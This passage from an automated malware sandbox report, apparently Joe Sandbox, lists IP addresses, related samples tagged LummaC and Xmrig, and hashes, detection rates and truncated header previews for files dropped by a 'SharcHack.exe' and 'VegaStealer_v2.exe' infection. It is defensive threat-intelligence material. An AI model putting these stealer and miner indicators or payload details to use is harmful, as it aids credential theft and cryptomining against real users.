                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 65.9.108.148
                                                                                                                                                                                                                • 13.226.4.166
                                                                                                                                                                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 65.9.108.93
                                                                                                                                                                                                                • 3.165.135.3
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 65.9.108.148
                                                                                                                                                                                                                • 13.226.4.166
                                                                                                                                                                                                                iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 65.9.108.93
                                                                                                                                                                                                                • 3.165.135.3
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 65.9.108.148
                                                                                                                                                                                                                • 13.226.4.166
                                                                                                                                                                                                                SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 65.9.108.93
                                                                                                                                                                                                                • 3.165.135.3
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 65.9.108.148
                                                                                                                                                                                                                • 13.226.4.166
                                                                                                                                                                                                                oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 65.9.108.93
                                                                                                                                                                                                                • 3.165.135.3
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 65.9.108.148
                                                                                                                                                                                                                • 13.226.4.166
                                                                                                                                                                                                                MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 65.9.108.93
                                                                                                                                                                                                                • 3.165.135.3
                                                                                                                                                                                                                • 18.66.161.123
                                                                                                                                                                                                                • 65.9.108.148
                                                                                                                                                                                                                • 13.226.4.166
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                C:\Program Files\Google\Libs\WR64.sys0Ty.png.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                  Qhx6a6VLAH.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                    88aext0k.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                      gaozw40v.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                        c2.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                          ldr.ps1Get hashmaliciousGO Miner, XmrigBrowse
                                                                                                                                                                                                                            ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                feZvV3DCj8.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                  services64.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3715584
                                                                                                                                                                                                                                    Entropy (8bit):7.962148701344369
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:98304:0eZMJ/TOW8jMNjfytwpCm4M47t9XI/vioBi:XaqWuMNVpCm/4AHBi
                                                                                                                                                                                                                                    MD5:A4C45AAF11FC601009A5682FD23790EE
                                                                                                                                                                                                                                    SHA1:A8EAC848583296B135AF5A473FC8CE48AF970B65
                                                                                                                                                                                                                                    SHA-256:D89C0E12B5FBBE103522FA152ADB3EDD6AFFF88D34D2BBF58CAF28E9C4DA0526
                                                                                                                                                                                                                                    SHA-512:CC735B14E4DF0260C8302761E52FD84BA06310D2DDE96C9089A8066F72B3B93D80C9E6548A18C35ECADD54479E99F80090AC31B7F30B682129B70B93095373A9
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....%pg...............&......8................@............................. 9.......8...`... ...............................................8.......9.......8...............9...............................8.(...................D.8..............................text...x...........................`..`.data... .7.......7.................@....rdata........8......z8.............@..@.pdata........8.......8.............@..@.xdata........8.......8.............@..@.bss....8.....8..........................idata........8.......8.............@....CRT....h.....8.......8.............@....tls..........8.......8.............@....rsrc.........9.......8.............@....reloc........9.......8.............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):14544
                                                                                                                                                                                                                                    Entropy (8bit):6.2660301556221185
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                    • Filename: 0Ty.png.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: Qhx6a6VLAH.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: 88aext0k.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: gaozw40v.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: c2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: ldr.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: ZppxPm0ASs.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: feZvV3DCj8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: services64.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):118
                                                                                                                                                                                                                                    Entropy (8bit):3.0142860822293245
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:QrjaP8FvEMlWlK3Fflovw9yxPMN/iKlS2tfIn:Q/a2vEMlWlKovw9yCdiKI2+n
                                                                                                                                                                                                                                    MD5:F17385D569C8B4AC1615974E65D023BD
                                                                                                                                                                                                                                    SHA1:1A225BE0148C906EA8C25F522A802376CCCB5F8F
                                                                                                                                                                                                                                    SHA-256:B0DF1034A7A46530513C2DEA5F7C64EDB7E20EE4C6508329FF3C56F5440F237F
                                                                                                                                                                                                                                    SHA-512:D61E19350FCB3BF6E021F67C72D040387082B93231232F9A04D1946E32678861FE404BD0B3EF3AD7E07E211C069A327FC5211CB27EC990AE75F8235F36526A07
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..N.a.m.e. . . . . . . .V.i.d.e.o.P.r.o.c.e.s.s.o.r. . .....8.N.S.P.W.N.9.V.5. . .9.2.Z.G.5.7.M. . . . . . . . . .....
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2589
                                                                                                                                                                                                                                    Entropy (8bit):5.347411404509576
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:MxHKXAHKze41qHiYHKh3oPtHo6+JHOHKU57UxHKMR0mHKtXoCayH5H/HKMHsLHmY:iqQqzfwCYqh3oPtI6IuqU57UxqMRnqNq
                                                                                                                                                                                                                                    MD5:696C6189688136406D72A0798AF5224F
                                                                                                                                                                                                                                    SHA1:6826DD4A2B09E5782E8A6B5AF6BEADF218CA616E
                                                                                                                                                                                                                                    SHA-256:484E1D3A551A6570FB7861010591CB48E36F1F81625879622AA8E12BAC367639
                                                                                                                                                                                                                                    SHA-512:17FE4A4C421A997265541E05E77FF4D7F5BFE6007D41A2293B3C62A0079CEDD0BCB346EDC6038A41F43DFE4D86493CE52EFBA34F92CF173D422809A9948BD746
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:@...e...........................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SharcHack.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3715584
                                                                                                                                                                                                                                    Entropy (8bit):7.962148701344369
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:98304:0eZMJ/TOW8jMNjfytwpCm4M47t9XI/vioBi:XaqWuMNVpCm/4AHBi
                                                                                                                                                                                                                                    MD5:A4C45AAF11FC601009A5682FD23790EE
                                                                                                                                                                                                                                    SHA1:A8EAC848583296B135AF5A473FC8CE48AF970B65
                                                                                                                                                                                                                                    SHA-256:D89C0E12B5FBBE103522FA152ADB3EDD6AFFF88D34D2BBF58CAF28E9C4DA0526
                                                                                                                                                                                                                                    SHA-512:CC735B14E4DF0260C8302761E52FD84BA06310D2DDE96C9089A8066F72B3B93D80C9E6548A18C35ECADD54479E99F80090AC31B7F30B682129B70B93095373A9
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....%pg...............&......8................@............................. 9.......8...`... ...............................................8.......9.......8...............9...............................8.(...................D.8..............................text...x...........................`..`.data... .7.......7.................@....rdata........8......z8.............@..@.pdata........8.......8.............@..@.xdata........8.......8.............@..@.bss....8.....8..........................idata........8.......8.............@....CRT....h.....8.......8.............@....tls..........8.......8.............@....rsrc.........9.......8.............@....reloc........9.......8.............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                    Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3316968
                                                                                                                                                                                                                                    Entropy (8bit):6.532906510598102
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:JIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9Y:6BbBWIgWljGxRB/LLY
                                                                                                                                                                                                                                    MD5:0CF454B6ED4D9E46BC40306421E4B800
                                                                                                                                                                                                                                    SHA1:9611AA929D35CBD86B87E40B628F60D5177D2411
                                                                                                                                                                                                                                    SHA-256:E51721DC0647F4838B1ABC592BD95FD8CB924716E8A64F83D4B947821FA1FA42
                                                                                                                                                                                                                                    SHA-512:85262F1BC67A89911640F59A759B476B30CA644BD1A1D9CD3213CC8AAE16D7CC6EA689815F19B146DB1D26F7A75772CEB48E71E27940E3686A83EB2CF7E46048
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....6Q3...@.................................G&1.O.....2..............|2.. ....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SharcHack.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):30016928
                                                                                                                                                                                                                                    Entropy (8bit):7.994332959692821
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:786432:Bl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHn:Bl3LMEXFhV0KAcNjxAItj
                                                                                                                                                                                                                                    MD5:CCEF241F10766A2E12298FBA4D319450
                                                                                                                                                                                                                                    SHA1:955C0A80105B034ED46941845FC9BDBE8187EE64
                                                                                                                                                                                                                                    SHA-256:590D28762BC431046A202D7BBAFB31F93FBBBC73A3C2291119B5C1139675B579
                                                                                                                                                                                                                                    SHA-512:D20A8F5AFAB8CD819AB81875BA9DBA5C5EBB9CEADF4D53BF19E1E99C4F16D1361AA272F49571C69C6CC375AFC8AC2F9C2E0293B5F2BF62F85CC5C23DFB3923F2
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 43%
                                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................R...^.......^.......p....@.......................................@......@...................@....... .......p...................+...................................`......................."..T....0.......................text....9.......:.................. ..`.itext.......P.......>.............. ..`.data....7...p...8...V..............@....bss.....m...............................idata....... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):586632
                                                                                                                                                                                                                                    Entropy (8bit):6.059056255747647
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:Pbfapjp4pWVWvFdpxhGOdBB6OHK1ivk4PQG2puGeqVmjaVmnS4bfu65B:P7usAOvphbu65
                                                                                                                                                                                                                                    MD5:F32CE9A5A866313D1A3391AA42153F4A
                                                                                                                                                                                                                                    SHA1:7404383A681A2EC1C5BF24152FA298E934F53783
                                                                                                                                                                                                                                    SHA-256:4583F9D1E62C90E3BC41D9FEACCA8152E3BB067B767E806872772EA9A55803E9
                                                                                                                                                                                                                                    SHA-512:A276ED47E0687699E844DFB8215B4EF922EB6B853D7CA4BBF707B4439C26F8AFC6886F00AF0B3BA76E2DD322A0870594D81BCDC2095656A2E5B78568DC5F3F51
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............*.... ........... .......................@......k$....`.....................................O.......t................#... ..........T............................................ ............... ..H............text...X.... ...................... ..`.rsrc...t...........................@..@.reloc....... ......................@..B........................H............................]..l.........................................{,...*..{-...*V.(......},.....}-...*...0..;........u......,/(/....{,....{,...o0...,.(1....{-....{-...o2...*.*. #'p )UU.Z(/....{,...o3...X )UU.Z(1....{-...o4...X*.0..X........r...p......%..{,............-.&.+.......o5....%..{-............-.&.+.......o5....(6...*V.(7.....(......(....*..{....*"..}....*..{....*"..}....*:.(......}....*..*J.......s8...(...+*J.......s9...(...+*........s:...(...+%-.&.......s:.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4773480
                                                                                                                                                                                                                                    Entropy (8bit):6.084582408535823
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:Ifl9Yy1hblT0KVDuv06QBhBiMyHBzwFRdH:IkutRVDuv06QbBisF
                                                                                                                                                                                                                                    MD5:00D48A062EF3DFFBA05159D019CF427D
                                                                                                                                                                                                                                    SHA1:4BA6DB0470C776423D73438894207B1D6F1E7B5D
                                                                                                                                                                                                                                    SHA-256:7E60999A5741B9B041D3A8D9BAD1C952E4CCE8216142327AB413B1DDCA70A4C5
                                                                                                                                                                                                                                    SHA-512:14B4F20F87B72C8BB0F129FDFA1B865DBC63E49B6FF763D29516AD7B235288FB959BD35609BAA3FD80E07BE4FBEB120EAAE475B7628A85D6CBC0110A442D39CE
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y]............" ..0...H........../H.. ....H...... ....................... I......AI...`...................................H.O.....H.$.............H.h$....I......-H.T............................................ ............... ..H............text.....H.. ....H................. ..`.rsrc...$.....H.......H.............@..@.reloc........I.......H.............@..B..................H.....H.............'.........d.>.....\-H.......................................{"...*..{#...*V.($.....}".....}#...*...0..;........u......,/(%....{"....{"...o&...,.('....{#....{#...o(...*.*. dL.. )UU.Z(%....{"...o)...X )UU.Z('....{#...o*...X*.0..X........r...p......%..{"............-.&.+.......o+....%..{#........w...-.&.+...w...o+....(,...*..{-...*..{....*V.($.....}-.....}....*...0..;........u......,/(%....{-....{-...o&...,.('....{.....{....o(...*.*. ...z )UU.Z(%....{-...o)...X )UU
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):584976
                                                                                                                                                                                                                                    Entropy (8bit):5.91011541005501
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:1cHfLcN/a4L/uhxq9UVFYHjL3VMsWn1s6QjRhF9gauyBuntfV+jPuxJk:1cTcVa4Lwxqc4jL3VKQjRhFjBDjPuxJk
                                                                                                                                                                                                                                    MD5:169B6D383B7C650AB3AE2129397A6CF3
                                                                                                                                                                                                                                    SHA1:FCAEF7DEFB04301FD55FB1421BB15EF96D7040D6
                                                                                                                                                                                                                                    SHA-256:B896083FEB2BDEDC1568B62805DBD354C55E57F2D2469A52AEC6C98F4EC2DEDF
                                                                                                                                                                                                                                    SHA-512:7A7A7BDB508B8BF177249251C83B65A2EF4A5D8B29397CAB130CB8444B23888678673A9A2E4B1C74CC095B358F923B9E7E5A91BFA8C240412D95765851F1DD87
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ....................... ......$.....@.....................................O......................../..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........o...`..................x.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{e....3...{d......(....,...{d...*..{f.......-..*...0...........-.r...ps....z.o......-.~....*.~....
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1402032
                                                                                                                                                                                                                                    Entropy (8bit):6.88401160982436
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:dMDaUv84L2G9qOzAMmMt9MXakDg+XoP2STgVUrrKfw/Rhngqno:dfW9GMvMX9onGAXno
                                                                                                                                                                                                                                    MD5:0A1E95B0B1535203A1B8479DFF2C03FF
                                                                                                                                                                                                                                    SHA1:20C4B4406E8A3B1B35CA739ED59AA07BA867043D
                                                                                                                                                                                                                                    SHA-256:788D748B4D35DFD091626529457D91E9EBC8225746211086B14FB4A25785A51E
                                                                                                                                                                                                                                    SHA-512:854ABCCA8D807A98A9AD0CA5D2E55716C3CE26FAE7EE4642796BAF415C3CFAD522B658963EAFE504ECAED6C2ECDCDF332C9B01E43DFA342FCC5CA0FBEDFE600E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........KA...A...A...Z/m.a...Z/X.}...Z/l....H.U.I..._.U.B...A......Z/h.@...Z/].@...Z/\.@...Z/[.@...RichA...................PE..L...6.c...........!.........:.......4.......................................`......7.....@..........................#..:...t...x........................T..........p...............................@...@...............(............................text............................... ..`.rdata..*M.......N..................@..@.data....t...@...T...$..............@....rsrc................x..............@..@.reloc..h...........................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):208560
                                                                                                                                                                                                                                    Entropy (8bit):6.124592164027391
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:wP46KP8cdA0TEocO+zaZ9W3+wLLexyLKHxLj:k46KP8c+0Qs
                                                                                                                                                                                                                                    MD5:162E50541954D792420156956B09D410
                                                                                                                                                                                                                                    SHA1:F10943992EAD2DD222DF7CCFC76D74D495EF086D
                                                                                                                                                                                                                                    SHA-256:20D7E37FEDCE140669E2A2D89F4E7A67405134CA1876A55F9CF9AB0EAE8F206E
                                                                                                                                                                                                                                    SHA-512:A86167344C9645387B6B0C95AB19F2ADFEE5573AB2C6068E38E3DE0B94990379A948F0E10214B6F7DCF1F5E3159032217113267B8A7B4365F19BA970A8A51BF9
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
